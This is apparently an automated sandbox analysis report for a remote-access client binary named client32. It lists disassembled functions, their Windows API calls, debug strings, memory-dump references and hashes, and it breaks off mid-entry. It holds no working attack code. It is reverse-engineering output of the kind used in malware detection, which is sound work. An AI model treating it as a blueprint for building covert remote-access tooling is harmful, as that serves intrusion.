Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 1100349E, 110034C4
hMenu, xrefs: 110034A3
hSub, xrefs: 110034C9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9

Function 110D1BE0 Relevance: 9.2, APIs: 6, Instructions: 207COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 110D1C56

Part of subcall function 1116305A: std::exception::_Copy_str.LIBCMT ref: 11163075

__CxxThrowException@8.LIBCMT ref: 110D1C6B

Part of subcall function 111634B1: RaiseException.KERNEL32(?,?,11110E64,?,?,?,?,?,11110E64,?,111CD988), ref: 111634F3

__strdup.LIBCMT ref: 110D1CAC
_free.LIBCMT ref: 110D1DAE

Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A

std::exception::exception.LIBCMT ref: 110D1DD6
__CxxThrowException@8.LIBCMT ref: 110D1DEB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw__strdupstd::exception::exception$Copy_strExceptionRaise_freestd::exception::_
String ID:
API String ID: 1242819099-0
Opcode ID: 05837782adce2f39e59b343baadd2eb5b1d733a9f298eabc3eb11f201e1c0e33
Instruction ID: 0fc57d5ce2b88c06f6c6d5646062053dd548a1ae398bdfc998d424eafef88a83
Opcode Fuzzy Hash: 05837782adce2f39e59b343baadd2eb5b1d733a9f298eabc3eb11f201e1c0e33
Instruction Fuzzy Hash: D051A179E0030A9BDB10DFA4C880B9EF7F9FF48714F104969E95A93641EB71B944CBA1

Function 11027580 Relevance: 9.1, APIs: 6, Instructions: 70threadwindowsleepCOMMON

Download Yara Rule

APIs

PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
String ID:
API String ID: 2375713580-0
Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91

Function 1113D790 Relevance: 9.0, APIs: 6, Instructions: 49synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11040BBA,00000000), ref: 1113D7C5
CreateThread.KERNEL32(00000000,00000000,1113D660,00000000,00000000,00000000), ref: 1113D7E0
SetEvent.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D805
WaitForSingleObject.KERNEL32(00000000,00001388,?,?,11040BBA,00000000), ref: 1113D816
CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D829
CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D83C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateEventHandle$ObjectSingleThreadWait
String ID:
API String ID: 414154005-0
Opcode ID: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
Instruction ID: 02350ad9304c652d5973a468123ac0969e3fb67a745117c4f7e49a1723ee0a3b
Opcode Fuzzy Hash: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
Instruction Fuzzy Hash: 9F11CE705C8265AAF7298BE5C9A8B95FFA4934631DF50402AF2389658CCBB02088CB54

Function 11147D20 Relevance: 9.0, APIs: 6, Instructions: 48threadsynchronizationCOMMON

Download Yara Rule

APIs

OpenThread.KERNEL32(0000004A,00000000,11147E88,?,?,?,?,?,11147E88), ref: 11147D4A
CreateThread.KERNEL32(00000000,00001000,11147CC0,?,00000000,?), ref: 11147D6E
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147E88), ref: 11147D79
GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147E88), ref: 11147D84
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147E88), ref: 11147D91
CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147E88), ref: 11147D97

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
String ID:
API String ID: 180989782-0
Opcode ID: 2b944cbc971911c5a5059b8beaba6a04507c48f893b2d3a9f630d0bb9898d94a
Instruction ID: 59a9bc19303320b9e0af2534b5cdb1e8fa88e93d3d5c232d55c0a2a8aa3d0bf5
Opcode Fuzzy Hash: 2b944cbc971911c5a5059b8beaba6a04507c48f893b2d3a9f630d0bb9898d94a
Instruction Fuzzy Hash: 54011E75D4022DAFDB04DFA8CD45BEEBBB8EF48710F108169F924E7684D7749A018B94

Function 111715A2 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 111715AE

Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685

__amsg_exit.LIBCMT ref: 111715CE
__lock.LIBCMT ref: 111715DE
InterlockedDecrement.KERNEL32(?), ref: 111715FB
_free.LIBCMT ref: 1117160E
InterlockedIncrement.KERNEL32(00691658), ref: 11171626

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
Opcode Fuzzy Hash: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6

Function 110B3560 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$EventObjectSingleWait
String ID:
API String ID: 2857295742-0
Opcode ID: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
Instruction ID: c91d849fc108652eb31eb37091e5d5d4b5a552e1f27565d093635cb0be7e85a1
Opcode Fuzzy Hash: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
Instruction Fuzzy Hash: 96011A75A087049BD7909FB988D4A96F7DCEB54300F11492EE5AEC3200CB78B8448F60

Function 11095990 Relevance: 9.0, APIs: 6, Instructions: 38COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 1109599E
GetSystemMetrics.USER32(0000004D), ref: 110959A7
GetSystemMetrics.USER32(0000004E), ref: 110959AE
GetSystemMetrics.USER32(00000000), ref: 110959B7
GetSystemMetrics.USER32(0000004F), ref: 110959BD
GetSystemMetrics.USER32(00000001), ref: 110959C5

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
Instruction ID: b65ab4a361e5326c91c4d36ade1d631f08c7cf5d252a1eb012e320adc1ee70d1
Opcode Fuzzy Hash: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
Instruction Fuzzy Hash: 01F030B1B4131A6BE7009FAADC41B55BB98EB48664F008037A71C87680D6B5A8108FE4

Function 1103B469 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1103B49C
SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1103B4C2

Strings

%SYS%, xrefs: 1103B47E
c:\program files, xrefs: 1103B4CC
"%PROG%, xrefs: 1103B4A4

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DirectoryFolderPathSystem
String ID: "%PROG%$%SYS%$c:\program files
API String ID: 2964528113-3967668164
Opcode ID: 7cf30191dcf4ef34aecef7f805cad9e123c76fa819111cdb0063898e71147746
Instruction ID: 1beb3ec06c52cebf7cdf59fed39cf9a477bc7fc2ab90d70df5bf6d0fd168e28b
Opcode Fuzzy Hash: 7cf30191dcf4ef34aecef7f805cad9e123c76fa819111cdb0063898e71147746
Instruction Fuzzy Hash: EA313735E0855A4FCB29CE349C94BEEB7E5EF85309F0041E8D89AD7744EB755944CB80

Function 110773B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON

Download Yara Rule

APIs

MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB

Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783

EqualRect.USER32(?,?), ref: 1107740C
SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466

Strings

m_hWnd, xrefs: 11077447
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$DeferEqualPointsRect
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2754115966-2830328467
Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4

Function 11049690 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1104971C
_free.LIBCMT ref: 11049779

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

ReleaseSmartcardDevice called, xrefs: 110496BD
idata->pSmartcardDevice == theSmartcardDevice, xrefs: 1104970D
CLTCONN.CPP, xrefs: 11049708

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_free_mallocwsprintf
String ID: CLTCONN.CPP$ReleaseSmartcardDevice called$idata->pSmartcardDevice == theSmartcardDevice
API String ID: 3300666597-3188990991
Opcode ID: bbd08ce13b15e0d7af9443266ff705f80d5dbbc8ca5254b04d83a5beabc5d6aa
Instruction ID: e35be207329a9a02e71ffc0183289b31f5ea9fbf546850573bb4cc18e029b419
Opcode Fuzzy Hash: bbd08ce13b15e0d7af9443266ff705f80d5dbbc8ca5254b04d83a5beabc5d6aa
Instruction Fuzzy Hash: D041AEB5A01611AFD704CF98D880EAAFBE4FB48328F6142BDE52997350E730A940CB95

Function 1109DB40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91windowthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageA.USER32(11027105,752BF08B,68575608,11199F9C), ref: 1109DBB6
SendMessageA.USER32(00000000,752BF08B,68575608,11199F9C), ref: 1109DBEF

Part of subcall function 1109DA70: IsWindow.USER32(?), ref: 1109DA8F
Part of subcall function 1109DA70: GetClassNameA.USER32(?,?,00000040), ref: 1109DAA0
Part of subcall function 1109DA70: FindWindowA.USER32(?,00000000), ref: 1109DAE1
Part of subcall function 1109DA70: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,1109ED09,000001F4,00000006,?,11067720,0000048C,00000001), ref: 1109DAFC
Part of subcall function 1109DA70: FindWindowA.USER32(?,00000000), ref: 1109DB0D

PostMessageA.USER32(00000000,752BF08B,68575608,11199F9C), ref: 1109DC0B

Strings

m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData), xrefs: 1109DB92
..\CTL32\ipc.cpp, xrefs: 1109DB8D

Memory Dump Source

